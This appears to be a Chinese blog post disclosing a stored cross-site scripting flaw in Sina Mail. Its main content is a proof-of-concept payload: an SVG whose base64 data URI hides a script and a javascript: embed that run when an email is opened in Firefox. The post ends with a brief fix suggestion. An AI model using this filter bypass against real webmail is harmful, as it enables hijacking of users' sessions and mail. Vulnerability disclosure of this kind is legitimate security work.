新浪邮箱存储型XSS 第二弹 – 网站安全 – 自学php

时间: 2020-10-10|tag: 50次围观|0 条评论

过滤机制不完善导致可植入恶意代码 缺点是Firefox only.优点是无须用户交互。 在邮件正文插入: 

<svg>

<use xlink:href="data:image/svg+xml;base64,

PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD

ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs

aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW

5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+

PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3

JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i

NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW

RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x

OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH

A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i

amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ

ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" />



</svg>

新浪邮箱存储型XSS 第二弹 – 网站安全 – 自学php插图

新浪邮箱存储型XSS 第二弹 – 网站安全 – 自学php插图1 修复方案: 针对性过滤一下吧

    上一篇: 新浪邮箱存储型XSS(字符集缺陷) - 网站安全

    下一篇: 大汉版通JCMS数据库配置文件读取漏洞 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《新浪邮箱存储型XSS 第二弹 – 网站安全 – 自学php
   

还没有人抢沙发呢~